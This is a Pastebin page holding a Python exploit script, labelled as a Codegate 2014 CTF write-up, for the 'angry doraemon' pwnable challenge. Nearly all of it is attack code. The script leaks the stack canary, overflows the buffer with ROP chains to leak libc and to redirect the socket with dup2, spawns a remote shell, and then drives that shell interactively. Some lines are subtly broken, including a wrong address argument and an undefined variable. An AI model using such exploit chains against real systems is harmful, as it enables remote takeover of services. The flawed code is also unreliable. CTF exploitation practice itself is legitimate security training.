daily pastebin goal
84%
SHARE
TWEET

Codegate 2014 doraemon write up by @_g05u_

a guest Feb 23rd, 2014 581 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #-*- coding:utf-8 -*-
  3.  
  4. # Codegate 2014 write up by @_g05u_
  5. # angry doraemon
  6. # pwnable 250
  7. # null-life.com
  8.  
  9. import re
  10. import os
  11. import sys
  12. import math
  13. import time
  14. import struct
  15. import socket
  16.  
  17. HOST = "58.229.183.18"
  18. PORT = 8888
  19.  
  20. #Ubuntu 13.10 x86
  21. offset_libc_main = 0x19810
  22. offset_dup2 = 0xE11F0
  23.  
  24. got_libc_main = 0x0804B038
  25. got_write = 0x080486e0
  26. rop_pop2_ret = 0x080495BE
  27. exec_sh = 0x08048C62
  28.  
  29. canary = "\x00\x8b\xc3\x84"
  30.  
  31.  
  32. def get_socket():
  33.     f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  34.     f.connect((HOST, PORT))
  35.     return f
  36.        
  37. def read_logo(s):
  38.         logo = ''
  39.         menu = ''
  40.         while 'Waiting 2 seconds' not in logo:
  41.                 logo = s.recv(1024 * 5)
  42.         time.sleep(2.2) #wait 2.2 sec
  43.         while '>' not in menu:
  44.                 menu = s.recv(1024)
  45.                
  46.  
  47. def gadget_leer(addr, n):
  48.         data  = struct.pack("<I", got_write)
  49.         data += struct.pack("<I", 0x080492c5) #exit return
  50.         data += struct.pack("<I", 0x4) #fd abierto
  51.         data += struct.pack("<I", addr)
  52.         data += struct.pack("<I", n)
  53.        
  54.         return data    
  55.  
  56. def get_canary():
  57.         print '[+] get canary '
  58.         s = get_socket()       
  59.         read_logo(s)
  60.         s.send('4')
  61.         time.sleep(0.1)
  62.         s.recv(1024) #leer pregunta
  63.         time.sleep(0.1)
  64.         s.send('y'*10)
  65.         time.sleep(0.1)
  66.         mi_opc = s.recv(26) #leer mi opcion
  67.         _canary = mi_opc[22:]
  68.         print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
  69.         return _canary
  70.  
  71. def get_rop_shell(libc_base):
  72.         print '[+] dup2 address: %s' % hex(libc_base + offset_dup2)
  73.         data  = struct.pack("<I", libc_base + offset_dup2)
  74.         data += struct.pack("<I", rop_pop2_ret)
  75.         data += struct.pack("<I", 4) #fd abierto
  76.         data += struct.pack("<I", 0)
  77.        
  78.         data += struct.pack("<I", libc_base + offset_dup2)
  79.         data += struct.pack("<I", rop_pop2_ret)
  80.         data += struct.pack("<I", 4) #fd abierto
  81.         data += struct.pack("<I", 1)
  82.        
  83.         data += struct.pack("<I", libc_base + offset_dup2)
  84.         data += struct.pack("<I", rop_pop2_ret)
  85.         data += struct.pack("<I", 4) #fd abierto
  86.         data += struct.pack("<I", 2)
  87.  
  88.         data += struct.pack("<I", exec_sh)     
  89.         return data    
  90.  
  91. canary = get_canary()
  92.        
  93. print 'Obteniendo libc base'
  94. #get libc address base 
  95. s = get_socket()       
  96. read_logo(s)
  97. s.send('4')
  98. time.sleep(0.1)
  99. s.recv(1024) #leer pregunta
  100. time.sleep(0.1)
  101. s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
  102. libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
  103. print '[+] Addres libc base: %s' % hex(libc_base_address)
  104.  
  105. print 'Lanzando shell'
  106. #lanzar shell
  107. rop_shell = get_rop_shell(libc_base_address)
  108. s = get_socket()       
  109. read_logo(s)
  110. s.send('4')
  111. time.sleep(0.1)
  112. s.recv(1024) #leer pregunta
  113. time.sleep(0.1)
  114. s.send('y'*10 + canary + "A"*12 + rop_shell)
  115.  
  116. while True:
  117.     sys.stdout.write("$ ")
  118.     sys.stdout.flush()
  119.     c = sys.stdin.readline()
  120.     s.send(c)
  121.     time.sleep(0.5)
  122.     print s.recv(4095)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top